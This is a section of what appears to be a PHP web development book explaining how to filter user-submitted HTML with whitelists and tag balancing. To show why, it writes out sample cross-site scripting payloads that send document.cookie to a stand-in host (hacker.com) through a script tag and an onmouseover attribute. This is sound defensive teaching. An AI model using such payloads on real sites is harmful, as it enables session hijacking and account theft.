5.5. Filtering HTML

Often, you want to allow users to style pieces of data they enter with rudimentary styling and attributes. When users enter a comment or description, you might want to allow them to enter a hyperlink, make a portion of their text bold, or even insert an image.

Since we'll be displaying it as HTML, it makes some amount of sense to accept and store it as HTML: it's already a markup language that does exactly what we want, and there'll be no translation layer to output it. But the arguments against receiving and storing styled user data as HTML are worth considering.

5.5.1. Why Use HTML?

HTML is not a very compressed format; in a web application with a limited allowed vocabulary, styling can be represented much more concisely. This can be an issue if storage space is at a premium or the dataset needs to be kept small to stay resident in memory. The actual size saving, however, usually turns out to be trivial when extrapolated. When the average piece of user text isn't styled at all, and each style block wastes five bytes, then you're not dealing with a huge aggregate increase in proportion to the size of the unstyled data.

HTML has a much wider vocabulary than is usually necessary for user input and is difficult to filter (we'll cover that in more detail shortly). Creating your own controlled formatting vocabulary makes for much easier input parsing. It does, however, make for more output formatting. This formatting tends to be far simpler and uses fewer cycles, but looking back to our input/output ratio, we can see that in the end we'll spend more time formatting data for output than for input.
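
As a rough illustration of that trade-off, here is a minimal sketch of a controlled vocabulary. The [b]...[/b] syntax and the function name render_user_text are assumptions invented for this example; they are not defined elsewhere in this chapter. The input needs no HTML filtering at all, but every output pass has to escape the text and translate the markers:

```php
<?php
// Hypothetical controlled vocabulary: the only styling users may enter is [b]...[/b].
function render_user_text(string $text): string
{
    // Escape everything first, so any HTML the user typed is displayed literally.
    $escaped = htmlspecialchars($text, ENT_QUOTES, 'UTF-8');

    // Translate only complete, matched [b]...[/b] pairs into real markup.
    return preg_replace('/\[b\](.*?)\[\/b\]/s', '<b>$1</b>', $escaped);
}

// Prints: <b>hello</b> &lt;script&gt;alert(1)&lt;/script&gt;
echo render_user_text('[b]hello[/b] <script>alert(1)</script>'), "\n";
```

An unmatched [b] is simply left as literal text, which is one reason a vocabulary like this is easier to handle than raw HTML.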

A positive argument for using HTML, at least at the input stage, is that generation of HTML input can be nicely streamlined. With contentEditable and friends, we can now build sophisticated user interfaces for styling text and inserting images and have the actual HTML source generated for us automatically; we don't have to force users to enter the HTML source themselves.

5.5.2. HTML Input Filtering

So we have a wonderful utopia of input and output and the world is once again a safe place, right? Of course, all is not as great as it first appears. Displaying user-entered HTML in your application is a really, really bad idea. There's nothing stopping somebody from entering this as their description:

hello world
<style>
body { display: none !important; }
</style>

Displaying this user-entered HTML would make the page it's shown on invisible. Besides simple pranks, there are possible security implications, too:

hello world
<script>
location.href = 'http://hacker.com/?cookies='+document.cookie;
</script>

Here when users visit the page, their cookies (which may allow an attacker to spoof their account) are sent to the hacker's web site to be collected for later use. This is not something you want to allow.

Both CSS styles and JavaScript are big spoofing holes that allow a myriad of pranks and attacks to be performed. PHP provides a strip_tags( ) function that removes tags, leaving only those you specify as allowed. Unfortunately, this does little to solve the issue. Consider the following example inputs:

<b style="display: block; 
        position: absolute; 
        top: 0px; 
        left: 0px; 
        width: 100%; 
        height: 100%; 
        background-color: #ffffff;">
                hello world</b>
<b onmouseover="location.href = 'http://hacker.com/?cookies='+
        document.cookie;">hello world</b>

Although we're only allowing simple style tags like <b>, we're still vulnerable to both style and script attacks. To be sure we're only allowing the markup we want, we need to filter both by tag and by attribute.
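
The limitation is easy to see with a short test. This is only a sketch; the input string is made up for the example:

```php
<?php
// Allow only <b> through strip_tags( ).
$input  = '<b onmouseover="alert(1)">hello world</b><script>alert(2)</script>';
$output = strip_tags($input, '<b>');

// The <script> tags are removed (their text content is left behind), but the
// onmouseover attribute on the allowed <b> tag passes through untouched.
echo $output, "\n";
```

The function filters by element name only, so anything carried in an attribute of an allowed tag is never inspected.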

5.5.3. Blacklists and Whitelists

Many filtering approaches try to remove elements and attributes that are known to cause problems: <script>, onclick, onmousedown, style, and so on. This method, often referred to as blacklisting, has a serious flaw: when a new browser comes out with new element and attribute support, you need to update your blacklist. The opposite approach, known conversely as whitelisting, combats this by only allowing a defined list of elements and attributes. A whitelist does not need updating as browsers change and is built around your business needs rather than your worries.
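
The difference shows up as soon as an attribute appears that neither list anticipated. The following sketch uses hypothetical helper names and deliberately short lists; onpointerdown stands in for any event attribute added to browsers after the blacklist was written:

```php
<?php
// Illustrative lists only; a real application would define its own.
$attr_blacklist = array('onclick', 'onmousedown', 'style');
$attr_whitelist = array('href', 'title');

// Blacklisting: everything is allowed unless it is known to be bad.
function passes_blacklist(string $attr, array $blacklist): bool
{
    return !in_array(strtolower($attr), $blacklist, true);
}

// Whitelisting: everything is rejected unless it is known to be wanted.
function passes_whitelist(string $attr, array $whitelist): bool
{
    return in_array(strtolower($attr), $whitelist, true);
}

var_dump(passes_blacklist('onpointerdown', $attr_blacklist)); // bool(true): slips through
var_dump(passes_whitelist('onpointerdown', $attr_whitelist)); // bool(false): rejected
```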

A good whitelist should be nice and short, allowing only the clearly needed elements and attributes. Unfortunately, merely filtering elements and attributes is not enough, and the content of some attributes needs to be filtered. The smaller the whitelist, the fewer the attributes that will need to be parsed and filtered and the fewer new possible vulnerabilities that can appear. This list, defined as an array of arrays in PHP, can be a good place to start:

$whitelist = array(
        'a' => array('href', 'target', 'title'),
        'b' => array( ),
        'img' => array('src', 'width', 'height', 'alt'),
);
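
To show how a list like this might be applied, here is a minimal sketch that rebuilds a single opening tag from a name and attributes that have already been parsed out of the input. The function names rebuild_open_tag and is_plain_web_url are hypothetical, the parsing step itself is left out, and the URL rule (absolute http or https only) is an assumption chosen for simplicity rather than a recommendation from this chapter:

```php
<?php
$whitelist = array(
    'a'   => array('href', 'target', 'title'),
    'b'   => array(),
    'img' => array('src', 'width', 'height', 'alt'),
);

// Hypothetical check for URL-carrying attributes: accept only absolute
// http:// or https:// URLs, which rejects javascript: and similar schemes.
function is_plain_web_url(string $value): bool
{
    return preg_match('#^https?://#i', $value) === 1;
}

// Hypothetical helper: rebuild one opening tag from its already-parsed name
// and attributes, keeping only what the whitelist allows.
function rebuild_open_tag(string $name, array $attributes, array $whitelist): string
{
    $name = strtolower($name);
    if (!isset($whitelist[$name])) {
        return '';                       // element not allowed: drop the tag
    }
    $out = '<' . $name;
    foreach ($attributes as $attr => $value) {
        $attr = strtolower($attr);
        if (!in_array($attr, $whitelist[$name], true)) {
            continue;                    // attribute not allowed for this element
        }
        if (($attr === 'href' || $attr === 'src') && !is_plain_web_url($value)) {
            continue;                    // allowed attribute, unacceptable content
        }
        $out .= ' ' . $attr . '="' . htmlspecialchars($value, ENT_QUOTES, 'UTF-8') . '"';
    }
    return $out . '>';
}

// Prints: <a title="hi">
echo rebuild_open_tag('a', array('href' => 'javascript:alert(1)', 'title' => 'hi'), $whitelist), "\n";
```

Rebuilding the tag from its parts, rather than editing the user's original string, means nothing reaches the output unless the filter wrote it there itself.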

5.5.4. Balancing

Filtering so that your data contains only the whitelisted elements and attributes won't necessarily make it valid and suitable for output. Consider the following user inputs:

<b>hello world
</div></div></div></div>hello world

The first example is a common and forgivable mistake: a user opens a formatting tag but forgets to close it. The effect varies depending on the tag in question, but can include making the remainder of the page bold or turning all of the remaining text into a link.

The second example is a little more malicious. If you allow your users to enter structural markup, such as div or td tags, then an attacker could break out of the layout of your site and cause interesting display issues (especially if your navigation markup follows your content markup).

Both of these examples show that it's important to "balance" the tags in your input: check that any tags opened in the text are also closed, and that any closing tags were opened. If you're displaying your output as XHTML, then you may also want to ensure that your tags nest correctly:

bad: <b><i>hello world</b></i>
good: <b><i>hello world</i></b>

Code that balances opening and closing tags also needs to deal with tags that don't need to be closed, such as <img> and <br>. In fact, your filtering will probably want to ensure that there are no matching closing tags; a </br> tag is not something you want to output. If you're outputting XHTML, you'll additionally want to ensure these tags self-close (<br />).
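
One way to approach balancing is to walk through the tags while keeping a stack of the elements currently open. The sketch below is an assumption about how this could be done, not the method used by any particular library; the function name balance_tags_sketch and the short list of unclosed tags are made up for the example, and it presumes the input has already been reduced to whitelisted tags:

```php
<?php
// Hypothetical balancer: closes unclosed tags, drops stray closing tags,
// fixes nesting order, and removes closing tags for elements like <br>.
function balance_tags_sketch(string $html, array $void_tags = array('br', 'img')): string
{
    $stack = array();   // names of the elements currently open
    $out   = '';

    // Split the input into text and tag tokens, keeping the tags themselves.
    $tokens = preg_split('/(<\/?[a-zA-Z][^>]*>)/', $html, -1,
                         PREG_SPLIT_DELIM_CAPTURE | PREG_SPLIT_NO_EMPTY);

    foreach ($tokens as $token) {
        if (!preg_match('/^<(\/?)([a-zA-Z][a-zA-Z0-9]*)[^>]*>$/', $token, $m)) {
            $out .= $token;              // plain text: pass through unchanged
            continue;
        }
        $closing = ($m[1] === '/');
        $name    = strtolower($m[2]);

        if (in_array($name, $void_tags, true)) {
            if (!$closing) {
                $out .= $token;          // keep <br>, silently drop </br>
            }
            continue;
        }
        if (!$closing) {
            $stack[] = $name;            // remember that this element is open
            $out .= $token;
            continue;
        }
        if (!in_array($name, $stack, true)) {
            continue;                    // closing tag that was never opened: drop it
        }
        // Close any inner elements first so that the nesting stays correct.
        do {
            $open = array_pop($stack);
            $out .= '</' . $open . '>';
        } while ($open !== $name);
    }

    // Close whatever is still open at the end of the input.
    while ($stack) {
        $out .= '</' . array_pop($stack) . '>';
    }
    return $out;
}

echo balance_tags_sketch('<b>hello world'), "\n";                // <b>hello world</b>
echo balance_tags_sketch('</div></div>hello world'), "\n";       // hello world
echo balance_tags_sketch('<b><i>hello world</b></i>'), "\n";     // <b><i>hello world</i></b>
```

This sketch does not rewrite <br> as <br /> for XHTML output; that would be an additional step when emitting the unclosed tags.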

5.5.5. Dealing with HTML

If you want to allow your users to enter HTML, whether directly or through a WYSIWYG editor, then you're going to need to think carefully about how to process it. In addition to deciding on a subset of allowed syntax, you'll need to actually filter the input, removing tags and attributes not on the whitelist and balancing the tags that require it.

All this can be a lot of work and is prone to error. While PHP doesn't have this kind of functionality built in (the best we're given is strip_tags( )), there are libraries available that do. lib_filter is a pure PHP implementation that is free for use under a Creative Commons license (http://code.iamcal.com/php/lib_filter).

In the next section, we'll explore how a library like this works and the techniques for safely filtering all aspects of user-entered data.
